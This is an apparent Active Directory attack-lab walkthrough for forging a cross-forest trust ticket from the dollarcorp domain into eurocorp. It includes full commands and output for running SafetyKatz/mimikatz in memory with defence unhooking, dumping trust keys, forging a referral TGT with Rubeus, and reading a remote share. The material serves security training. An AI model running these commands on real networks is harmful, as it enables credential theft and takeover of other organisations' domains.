Learning Object 20
Tasks
1 – With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest
Flag 31 [eurocorp-dc] – Service for which a TGS is requested from eurocorp-dc 🚩
Flag 32 [eurocorp-dc] – Contents of secret.txt on eurocorp-dc 🚩
Solutions
1 – With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest
We need the trust key for the trust between dollarcorp and eurocrop, which can be retrieved using Mimikatz or SafetyKatz.
Start a process with DA privileges. Run the below command from an elevated command prompt:
First to all start a process as DA:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /pttRun the below commands from the process running as DA to copy Loader.exe on dcorp-dc and use it to extract credentials:
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"
mimikatz(commandline) # lsadump::evasive-trust /patch
Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)
C:\Windows\system32>klist
Current LogonId is 0:0x2d293d7f
Cached Tickets: (1)
#0> Client: svcadmin @ DOLLARCORP.MONEYCORP.LOCAL
Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 11/21/2025 7:09:29 (local)
End Time: 11/21/2025 17:09:29 (local)
Renew Time: 11/28/2025 7:09:29 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
C:\Windows\system32>echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
C:\AD\Tools\Loader.exe
1 File(s) copied
C:\Windows\system32>winrs -r:dcorp-dc cmd
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.
C:\Users\svcadmin>netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98
C:\Users\svcadmin>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://127.0.0.1:8080/SafetyKatz.exe Arguments : lsadump::evasive-trust /patch exit
.#####. mimikatz 2.2.0 (x64) #19041 Nov 5 2024 21:52:02
mimikatz(commandline) # lsadump::evasive-trust /patch
Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)
Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 11/20/2025 9:11:47 PM - CLEAR - 1d 02 4f 0e ef 3c 6b c5 a9 68 da a8 ff 84 46 8a d7 73 65 a8 a6 f9 66 7a 36 b9 84 0e
* aes256_hmac 1474657fb02a0d0962ef38a7e2012168125740f0792ecfdcae819a0bb71f059e
* aes128_hmac 76dde25f5cb939a9d05a27c51e5bc7ba
* rc4_hmac_nt b97258189d756ae1eceeafa5be671457
[ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 11/20/2025 9:11:47 PM - CLEAR - 1d 02 4f 0e ef 3c 6b c5 a9 68 da a8 ff 84 46 8a d7 73 65 a8 a6 f9 66 7a 36 b9 84 0e
* aes256_hmac 12a4abf8b945837dcbb84057eda74edc4640e6b4cd4217616a90418e1b162389
* aes128_hmac 97dba31e904a25f6fc39fdd6166ab53e
* rc4_hmac_nt b97258189d756ae1eceeafa5be671457
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 10/28/2025 8:02:55 PM - CLEAR - 87 56 2b ce 99 43 58 c6 aa 1e e9 c3 e3 17 23 37 3b 85 aa 14 d5 86 06 f4 a8 e8 b5 dd
* aes256_hmac b808886542d5ea5a9208dda236cc687cd861a73973eed77c0ef9d734411ec26c
* aes128_hmac 829ca62806fba9880a9e57570c9a7b0b
* rc4_hmac_nt f5e6ae3ac347db331bf8fae481e2add9
[Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 10/28/2025 8:02:55 PM - CLEAR - 87 56 2b ce 99 43 58 c6 aa 1e e9 c3 e3 17 23 37 3b 85 aa 14 d5 86 06 f4 a8 e8 b5 dd
* aes256_hmac b1730088086a05cd9f6b6e110d4c2197c434cbb425237e833e82ef6d0ffef3d6
* aes128_hmac 6b069f352975003d6667f937bb316f69
* rc4_hmac_nt f5e6ae3ac347db331bf8fae481e2add9
Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 11/20/2025 9:11:54 PM - CLEAR - 34 33 3c 6c 17 9d 51 f2 3c 5b 51 66 0f 2b 28 6c 95 a5 b5 86 8c 84 8d 96 76 cc 66 c3
* aes256_hmac cd470abac8112ddf6bb71476b299a72cd12c1431d43391f9dfa0b5b4dec103d9
* aes128_hmac 4954422aabc2d55da5da954c57dd4835
* rc4_hmac_nt 54eeab7d22c9737cc200d697d2528a40
[ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 11/20/2025 9:11:54 PM - CLEAR - 34 33 3c 6c 17 9d 51 f2 3c 5b 51 66 0f 2b 28 6c 95 a5 b5 86 8c 84 8d 96 76 cc 66 c3
* aes256_hmac c19d7fd15fe97c0498afd8a1d0677ff5d21da0c87c9962d755d649380e582818
* aes128_hmac 1bc4b26049a0394471fd7ec7ffb1663b
* rc4_hmac_nt 54eeab7d22c9737cc200d697d2528a40
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 10/28/2025 8:03:10 PM - CLEAR - 52 32 26 df e4 45 cd 5f 6f 81 46 1d 08 5f 84 2d 87 15 cc 5b 23 df 86 29 46 06 2c 3c
* aes256_hmac c46a67dc004efe316925c4229f77861ad551c14fe7e53bc86dc4fb07c38a0417
* aes128_hmac 850f8059df357c0f05d9dfd3be600350
* rc4_hmac_nt b45751dacee142681ed299777fbd5e85
[Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 10/28/2025 8:03:10 PM - CLEAR - 52 32 26 df e4 45 cd 5f 6f 81 46 1d 08 5f 84 2d 87 15 cc 5b 23 df 86 29 46 06 2c 3c
* aes256_hmac b181e6f8dc36948d6d6136d1b2e0a2d671ffe95c7f1351e25a29b8820b3b5717
* aes128_hmac 95ae70e4be6d836b095c52e04c0cc5d8
* rc4_hmac_nt b45751dacee142681ed299777fbd5e85
Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 11/20/2025 9:11:52 PM - CLEAR - c1 21 4b 8c c0 d4 0f b1 41 db c9 36 45 25 e7 d5 44 e0 e4 2a 4e 22 2f 18 4a c7 82 5e
* aes256_hmac de4319c5f0f09ea07d28b20dfd473424d293fa5eb4fe0d7c35c622c7a7141883
* aes128_hmac 76374484bba81cf3b846aa24cf7f5e6b
* rc4_hmac_nt d418915cb2459e02cd612e1bab6632a7
[ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 11/20/2025 9:11:52 PM - CLEAR - c1 21 4b 8c c0 d4 0f b1 41 db c9 36 45 25 e7 d5 44 e0 e4 2a 4e 22 2f 18 4a c7 82 5e
* aes256_hmac b7edf9f19286966d4d1984b76af30839ca06a606e4ead91f0f76c8e8007917d0
* aes128_hmac 13e386e460f0cd28241d49b17155783d
* rc4_hmac_nt d418915cb2459e02cd612e1bab6632a7
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 10/28/2025 8:03:04 PM - CLEAR - a0 2a f2 8c 58 dd 33 17 7d ab 7c ad 8c f0 44 12 bf a2 fe 46 de 82 ad c6 4f 48 02 fc
* aes256_hmac e488ce0980cb99955f6e125bf270fc3f777872027d12589384a4b20428f18cf4
* aes128_hmac fb717a9bedc09971ccc9d6759f90f20a
* rc4_hmac_nt eb18052334cdd048166749c13e2e0b5c
[Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 10/28/2025 8:03:04 PM - CLEAR - a0 2a f2 8c 58 dd 33 17 7d ab 7c ad 8c f0 44 12 bf a2 fe 46 de 82 ad c6 4f 48 02 fc
* aes256_hmac ab20acc4fb33ab4959a4aaf5d40805295b57158b0c3a8a589b9ac39b276f1750
* aes128_hmac f02dd82fc00fd22d11b32e1d186a7026
* rc4_hmac_nt eb18052334cdd048166749c13e2e0b5c
mimikatz(commandline) # exit
Bye!
C:\Users\svcadmin>
C:\Users\svcadmin>
Let's Forge a referral ticket.
Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 11/20/2025 9:11:52 PM - CLEAR - c1 21 4b 8c c0 d4 0f b1 41 db c9 36 45 25 e7 d5 44 e0 e4 2a 4e 22 2f 18 4a c7 82 5e
* aes256_hmac de4319c5f0f09ea07d28b20dfd473424d293fa5eb4fe0d7c35c622c7a7141883
* aes128_hmac 76374484bba81cf3b846aa24cf7f5e6b
* rc4_hmac_nt d418915cb2459e02cd612e1bab6632a7
Note that we are not injecting any SID History here as it would be filtered out. Run the below command:
In a new low priv cmd prompt run
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:d418915cb2459e02cd612e1bab6632a7 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrapC:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:d418915cb2459e02cd612e1bab6632a7 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:d418915cb2459e02cd612e1bab6632a7 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
[*] Action: Build TGS
[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC
[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ExtraSIDs : S-1-5-21-335606122-960912869-3279953914-519
[*] ServiceKey : D418915CB2459E02CD612E1BAB6632A7
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : D418915CB2459E02CD612E1BAB6632A7
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : krbtgt
[*] Target : DOLLARCORP.MONEYCORP.LOCAL
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@dollarcorp.moneycorp.local'
[*] AuthTime : 11/21/2025 7:17:44 AM
[*] StartTime : 11/21/2025 7:17:44 AM
[*] EndTime : 11/21/2025 5:17:44 PM
[*] RenewTill : 11/28/2025 7:17:44 AM
[*] base64(ticket.kirbi):
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
C:\Users\student98>
Copy the base64 encoded ticket from above and use it in the following command:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:Once the ticket is injected, we can access explicitly shared resources on eurocorp-dc.
type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\C:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket: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
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket: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
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/eurocorp-dc.eurocorp.LOCAL'
[*] Using domain controller: eurocorp-dc.eurocorp.LOCAL (172.16.15.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
doIF5jCCBeKgAwIBBaEDAgEWooIEyDCCBMRhggTAMIIEvKADAgEFoRAbDkVVUk9DT1JQLkxPQ0FMoi0w
